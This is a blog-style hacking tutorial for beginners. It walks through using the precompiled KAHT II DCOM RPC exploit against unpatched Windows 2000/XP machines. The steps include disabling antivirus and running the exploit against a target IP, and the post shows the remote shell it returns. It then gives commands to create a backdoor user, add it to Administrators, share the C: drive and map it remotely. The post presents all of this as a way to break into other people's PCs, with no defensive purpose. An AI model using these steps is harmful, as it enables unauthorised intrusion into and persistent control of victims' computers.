Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.
Read this tutorial about compiling exploits.
But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.
Check this example of how a exploit works:
KAHT II - MASSIVE RPC EXPLOIT
This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.
This is an explanation of how to use it :
1. Get target IP, make sure it uses XP or 2k
2. Download exploit tool
(make sure to deactivate your AV)
3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101
note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1
4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------
Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
C:\WINNT\system32>
5. NOW.. YOU ARE IN TARGET DRIVE
6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password
7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user
8. Sharing drive
C:\WINNT\system32>net share c=c:
9. Exit from target.. dont forget!
C:\WINNT\system32>exit
10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here
There you will now have a mapped drive to the target PC and an administrator account.
No comments:
Post a Comment